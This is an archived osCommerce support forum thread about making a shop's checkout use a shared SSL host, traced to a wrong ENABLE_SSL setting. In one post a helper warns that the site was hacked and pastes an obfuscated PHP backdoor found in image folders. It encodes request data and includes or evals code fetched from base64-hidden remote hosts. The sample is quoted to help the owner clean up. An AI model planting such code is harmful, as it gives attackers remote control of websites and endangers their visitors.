tropiland Posted May 25, 2008 Posted May 25, 2008 Hello to all, I have a Shared SSL through my webhosting provider that looks like https://mydomain.c4.mywebhostdomain.com.I tried to integrate my osCommerece shopping cart so it will operated under this SSSL by goint to my /catalog/includes/configure.php and put the HTTP server and HTTPS server as follows: <?php/* $Id: configure.php,v 1.14 2003/07/09 01:15:48 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ // Define the webserver and path parameters // * DIR_FS_* = Filesystem directories (local/physical) // * DIR_WS_* = Webserver directories (virtual/URL) define('HTTP_SERVER', 'http://mydomain.com'); // eg, http://localhost - should not be empty for productive servers define('HTTPS_SERVER', 'https://mydomain.c4.mywebhostingdomain.com'); // eg, https://localhost - should not be empty for productive servers define('ENABLE_SSL', true); // secure webserver for checkout procedure?.......the rest of the file..... However, when I tried my shopping cart, it does not switch to the HTTPS server at check-out. What have I done wrong? How can I set up my shopping cart for HTTPS checkout? Thank you in advance for your time and consideration. Dimitri "El Greco" Svolos
germ Posted May 26, 2008 Posted May 26, 2008 Many times with shared SSL you have to make an edit to your /includes/application_top.php around line 40: // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; That code usually doesn't work with shared SSL, but there are ways to find something that does work. But you'll have to post or PM me your URL before I can be much assistance. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted May 26, 2008 Author Posted May 26, 2008 Many times with shared SSL you have to make an edit to your /includes/application_top.php around line 40: // set the type of request (secure or not) $request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL'; That code usually doesn't work with shared SSL, but there are ways to find something that does work. But you'll have to post or PM me your URL before I can be much assistance. URL's sent to your inbox.
germ Posted May 26, 2008 Posted May 26, 2008 Examining things now. osC is recognizing the SSL when you force it in the URL. That's good. Look on your site for this file: /catalog/includes/local/configure.php If it exists, be sure the data in it is correct. It may have a line like this: define('ENABLE_SSL', 0); You'll need to change it to: define('ENABLE_SSL', 1); Let me know what you find out. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted May 26, 2008 Posted May 26, 2008 You have some items in your /catalog/includes/footer.php causing the "non secure items" popup when viewing the site in IE (Firefox is OK). First, make a backup of /catalog/includes/footer.php Then, it it find this code: <!-- Start of StatCounter Code --> Replace it with this code: <?php if ( $request_type != 'SSL' ) { ?> <!-- Start of StatCounter Code --> A little farther down in the code, find this: <!-- End Google Analytics Code --> Replace it with: <!-- End Google Analytics Code --> <?php } ?> If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted May 26, 2008 Posted May 26, 2008 And I think your site has been hacked. I'd bet your /catalog/images folder permissions are at 777 Take a peek at all these files. I think you'll find them something you don't want: Index of /catalog/images Name Last modified Size Description -------------------------------------------------------------------------------- 0235947.php 24-May-2008 06:57 1k 235947.php 17-Apr-2008 16:29 1k Index of /catalog/images/Eemax Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 168705.php 17-Apr-2008 16:29 1k Index of /catalog/images/Stiebel Eltron Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 212605.php 17-Apr-2008 16:29 1k Index of /catalog/images/Temporary Name Last modified Size Description -------------------------------------------------------------------------------- 212380.php 17-Apr-2008 16:29 1k Index of /catalog/images/Titan Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 89190.php 17-Apr-2008 16:29 1k Index of /catalog/images/Warmrails Name Last modified Size Description -------------------------------------------------------------------------------- 56899.php 17-Apr-2008 16:29 1k Index of /catalog/images/Water Ionizers Name Last modified Size Description -------------------------------------------------------------------------------- 171625.php 17-Apr-2008 16:29 1k Index of /catalog/images/banners Name Last modified Size Description -------------------------------------------------------------------------------- 84119.php 17-Apr-2008 16:29 1k Index of /catalog/images/default Name Last modified Size Description -------------------------------------------------------------------------------- 85574.php 17-Apr-2008 16:29 1k Index of /catalog/images/gt_interactive Name Last modified Size Description -------------------------------------------------------------------------------- 179503.php 17-Apr-2008 16:29 1k Index of /catalog/images/hewlett_packard Name Last modified Size Description -------------------------------------------------------------------------------- 20438.php 17-Apr-2008 16:29 1k Index of /catalog/images/icons Name Last modified Size Description -------------------------------------------------------------------------------- 0209592.php 24-May-2008 01:18 1k 209592.php 17-Apr-2008 16:29 1k Index of /catalog/images/infobox Name Last modified Size Description -------------------------------------------------------------------------------- 113644.php 17-Apr-2008 16:29 1k Index of /catalog/images/mail Name Last modified Size Description -------------------------------------------------------------------------------- 070344.php 24-May-2008 02:27 1k 70344.php 17-Apr-2008 16:29 1k Index of /catalog/images/matrox Name Last modified Size Description -------------------------------------------------------------------------------- 107656.php 17-Apr-2008 16:29 1k Index of /catalog/images/microsoft Name Last modified Size Description -------------------------------------------------------------------------------- 231783.php 17-Apr-2008 16:29 1k Index of /catalog/images/sierra Name Last modified Size Description -------------------------------------------------------------------------------- 71286.php 17-Apr-2008 16:29 1k You need to set your folders to 755 permissions If you have a /backups folder in your admin it probably has bad files in it as well. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted June 1, 2008 Author Posted June 1, 2008 And I think your site has been hacked. I'd bet your /catalog/images folder permissions are at 777 Take a peek at all these files. I think you'll find them something you don't want: Index of /catalog/images Name Last modified Size Description -------------------------------------------------------------------------------- 0235947.php 24-May-2008 06:57 1k 235947.php 17-Apr-2008 16:29 1k Index of /catalog/images/Eemax Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 168705.php 17-Apr-2008 16:29 1k Index of /catalog/images/Stiebel Eltron Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 212605.php 17-Apr-2008 16:29 1k Index of /catalog/images/Temporary Name Last modified Size Description -------------------------------------------------------------------------------- 212380.php 17-Apr-2008 16:29 1k Index of /catalog/images/Titan Tankless Name Last modified Size Description -------------------------------------------------------------------------------- 89190.php 17-Apr-2008 16:29 1k Index of /catalog/images/Warmrails Name Last modified Size Description -------------------------------------------------------------------------------- 56899.php 17-Apr-2008 16:29 1k Index of /catalog/images/Water Ionizers Name Last modified Size Description -------------------------------------------------------------------------------- 171625.php 17-Apr-2008 16:29 1k Index of /catalog/images/banners Name Last modified Size Description -------------------------------------------------------------------------------- 84119.php 17-Apr-2008 16:29 1k Index of /catalog/images/default Name Last modified Size Description -------------------------------------------------------------------------------- 85574.php 17-Apr-2008 16:29 1k Index of /catalog/images/gt_interactive Name Last modified Size Description -------------------------------------------------------------------------------- 179503.php 17-Apr-2008 16:29 1k Index of /catalog/images/hewlett_packard Name Last modified Size Description -------------------------------------------------------------------------------- 20438.php 17-Apr-2008 16:29 1k Index of /catalog/images/icons Name Last modified Size Description -------------------------------------------------------------------------------- 0209592.php 24-May-2008 01:18 1k 209592.php 17-Apr-2008 16:29 1k Index of /catalog/images/infobox Name Last modified Size Description -------------------------------------------------------------------------------- 113644.php 17-Apr-2008 16:29 1k Index of /catalog/images/mail Name Last modified Size Description -------------------------------------------------------------------------------- 070344.php 24-May-2008 02:27 1k 70344.php 17-Apr-2008 16:29 1k Index of /catalog/images/matrox Name Last modified Size Description -------------------------------------------------------------------------------- 107656.php 17-Apr-2008 16:29 1k Index of /catalog/images/microsoft Name Last modified Size Description -------------------------------------------------------------------------------- 231783.php 17-Apr-2008 16:29 1k Index of /catalog/images/sierra Name Last modified Size Description -------------------------------------------------------------------------------- 71286.php 17-Apr-2008 16:29 1k You need to set your folders to 755 permissions If you have a /backups folder in your admin it probably has bad files in it as well. Thank you for all your help.Yes we've been hacked and, since then, reset the permissions to 755. I checked my configure.php file and, I think it is OK. However, my customers still do not enter the HTPPS when checking out. I am putting both catalog/includes/configure.php and admin/includes/configure.php. for you rreview. I am missing something here? catalog/includes/configure.php: <?php/* $Id: configure.php,v 1.14 2003/07/09 01:15:48 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ // Define the webserver and path parameters // * DIR_FS_* = Filesystem directories (local/physical) // * DIR_WS_* = Webserver directories (virtual/URL) define('HTTP_SERVER', 'http://www.e-smartliving.com'); // eg, http://localhost - should not be empty for productive servers define('HTTPS_SERVER', 'https://e-smartliving.c4.ixwebhosting.com'); // eg, https://localhost - should not be empty for productive servers define('ENABLE_SSL', 1); // secure webserver for checkout procedure? define('HTTP_COOKIE_DOMAIN', 'www.e-smartliving.com'); define('HTTPS_COOKIE_DOMAIN', 'e-smartliving.c4.ixwebhosting.com'); define('HTTP_COOKIE_PATH', '/'); define('HTTPS_COOKIE_PATH', '/'); define('DIR_WS_HTTP_CATALOG', '/catalog/'); define('DIR_WS_HTTPS_CATALOG', '/catalog/'); define('DIR_WS_IMAGES', 'images/'); define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/'); define('DIR_WS_INCLUDES', 'includes/'); define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/'); define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/'); define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/'); define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/'); define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/'); define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/'); define('DIR_FS_CATALOG', dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/'); define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/'); define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/'); // define our database connection define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers define('DB_SERVER_USERNAME', ''); define('DB_SERVER_PASSWORD', ''); define('DB_DATABASE', 'osCommerce'); define('USE_PCONNECT', 'false'); // use persistent connections? define('STORE_SESSIONS', ''); // leave empty '' for default handler or set to 'mysql' define('FEATURED_PRODUCTS_DISPLAY', false) ?> admin/icludes/configure.php: <?php/* $Id: configure.php,v 1.14 2003/02/21 16:55:24 dgw_ Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2002 osCommerce Released under the GNU General Public License */ // define our webserver variables // FS = Filesystem (physical) // WS = Webserver (virtual) define('HTTP_SERVER', 'http://ww.e-smartliving.com'); // eg, http://localhost or - https://localhost should not be NULL for productive servers define('HTTP_CATALOG_SERVER', 'http://www.e-smartliving.com'); define('HTTPS_CATALOG_SERVER', 'https://e-smartliving.c4.ixwebhosting.com'); define('ENABLE_SSL_CATALOG', 1); // secure webserver for catalog module define('DIR_FS_DOCUMENT_ROOT', $DOCUMENT_ROOT); // where your pages are located on the server. if $DOCUMENT_ROOT doesnt suit you, replace with your local path. (eg, /usr/local/apache/htdocs) define('DIR_WS_ADMIN', '/admin/'); define('DIR_FS_ADMIN', DIR_FS_DOCUMENT_ROOT . DIR_WS_ADMIN); define('DIR_WS_CATALOG', '/catalog/'); define('DIR_FS_CATALOG', DIR_FS_DOCUMENT_ROOT . DIR_WS_CATALOG); define('DIR_WS_IMAGES', 'images/'); define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/'); define('DIR_WS_CATALOG_IMAGES', DIR_WS_CATALOG . 'images/'); define('DIR_WS_INCLUDES', 'includes/'); define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/'); define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/'); define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/'); define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/'); define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/'); define('DIR_WS_CATALOG_LANGUAGES', DIR_WS_CATALOG . 'includes/languages/'); define('DIR_FS_CATALOG_LANGUAGES', DIR_FS_CATALOG . 'includes/languages/'); define('DIR_FS_CATALOG_IMAGES', DIR_FS_CATALOG . 'images/'); define('DIR_FS_CATALOG_MODULES', DIR_FS_CATALOG . 'includes/modules/'); define('DIR_FS_BACKUP', DIR_FS_ADMIN . 'backups/'); // define our database connection define('DB_SERVER', ''); define('DB_SERVER_USERNAME', 'mysql'); define('DB_SERVER_PASSWORD', ''); define('DB_DATABASE', 'osCommerce'); define('USE_PCONNECT', 'false'); define('STORE_SESSIONS', ''); ?> Thanx!
germ Posted June 1, 2008 Posted June 1, 2008 What did you find out here? Click Me :unsure: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted June 1, 2008 Posted June 1, 2008 And you've still got a lot of those rogue PHP files in your images folder. Looks to me like. They probably have data in them that looks a lot like this: <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?> You should probably remove them if they are not something you put there or recognize. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
germ Posted June 1, 2008 Posted June 1, 2008 If the /catalog/includes/local/configure.php file isn't there, please do this: Copy the text in the CODE box below into a text editor (Notepad) on your PC: <?php echo 'HTTP HOST: ' . "$HTTP_HOST"; echo '<br>Server Port: ' . getenv('SERVER_PORT'); echo '<br>SSL Status: ' . getenv('HTTPS'); echo '<br>Fowarded Server: ' . getenv('HTTP_X_FORWARDED_SERVER'); echo '<br>Fowarded Host: ' . getenv('HTTP_X_FORWARDED_HOST'); echo '<br>Fowarded By: ' . getenv('HTTP_X_FORWARDED_BY'); ?> Save it as myenv.php Upload it into your /catalog folder on your server. Then, access it using this link: <-- VERY IMPORTANT!!! Click Me It will output some text to your browser. Copy/paste that output into your next post. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted June 1, 2008 Author Posted June 1, 2008 If the /catalog/includes/local/configure.php file isn't there, please do this: Copy the text in the CODE box below into a text editor (Notepad) on your PC: <?php echo 'HTTP HOST: ' . "$HTTP_HOST"; echo '<br>Server Port: ' . getenv('SERVER_PORT'); echo '<br>SSL Status: ' . getenv('HTTPS'); echo '<br>Fowarded Server: ' . getenv('HTTP_X_FORWARDED_SERVER'); echo '<br>Fowarded Host: ' . getenv('HTTP_X_FORWARDED_HOST'); echo '<br>Fowarded By: ' . getenv('HTTP_X_FORWARDED_BY'); ?> Save it as myenv.php Upload it into your /catalog folder on your server. Then, access it using this link: <-- VERY IMPORTANT!!! Click Me It will output some text to your browser. Copy/paste that output into your next post. As per your instructions, here is the output text generated: HTTP HOST: e-smartliving.c4.ixwebhosting.comServer Port: 443 SSL Status: on Fowarded Server: Fowarded Host: Fowarded By:
germ Posted June 1, 2008 Posted June 1, 2008 And this file doesn't exist: /catalog/includes/local/configure.php ? :unsure: Everything looks like it should work. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted June 2, 2008 Author Posted June 2, 2008 And this file doesn't exist: /catalog/includes/local/configure.php ?:unsure: Everything looks like it should work. It does exist and here is what it looks like: <? define('HTTP_SERVER', 'http://e-smartliving.com'); define('DIR_FS_DOCUMENT_ROOT', '/hsphere/local/home/tropilan/e-smartliving.com/'); define('DIR_FS_LOGS', '/hsphere/local/home/tropilan/logs/e-smartliving.com'); define('ENABLE_SSL', 0); // define our database connection define('DB_SERVER', 'mysql37.ixwebhosting.com'); define('DB_SERVER_USERNAME', 'xxxxxxx'); define('DB_SERVER_PASSWORD', 'xxxxxxx'); define('DB_DATABASE', 'tropila_esl'); define('CONFIGURE_STATUS_COMPLETED', 1); define('USE_PCONNECT', 'false'); define('STORE_SESSIONS', 'mysql'); ?> I xxxed password and user name for obvious reasons
germ Posted June 2, 2008 Posted June 2, 2008 That's the problem. This: define('ENABLE_SSL', 0); Needs to be: define('ENABLE_SSL', 1); You should pay closer attention. I've asked you to check for this several times now. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted June 2, 2008 Author Posted June 2, 2008 That's the problem. This: define('ENABLE_SSL', 0); Needs to be: define('ENABLE_SSL', 1); You should pay closer attention. I've asked you to check for this several times now. Ooops! Corrected it! Thought I had done it!
tropiland Posted June 2, 2008 Author Posted June 2, 2008 Ooops! Corrected it! Thought I had done it! It works now! Thank you so much for your patience and consideration.
germ Posted June 2, 2008 Posted June 2, 2008 No problem. ;) You still have "hack" PHP files in you images folder, I believe: Index of /catalog/images/Warmrails Name Last modified Size Description -------------------------------------------------------------------------------- Parent Directory 01-Jun-2008 18:12 - 56899.php 17-Apr-2008 16:29 1k That's just one example. There are more in other subfolders. Check all the subfolders in your images folder. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
tropiland Posted June 2, 2008 Author Posted June 2, 2008 No problem. ;) You still have "hack" PHP files in you images folder, I believe: Index of /catalog/images/Warmrails Name Last modified Size Description -------------------------------------------------------------------------------- Parent Directory 01-Jun-2008 18:12 - 56899.php 17-Apr-2008 16:29 1k That's just one example. There are more in other subfolders. Check all the subfolders in your images folder. Will sure do!
Recommended Posts
Archived
This topic is now archived and is closed to further replies.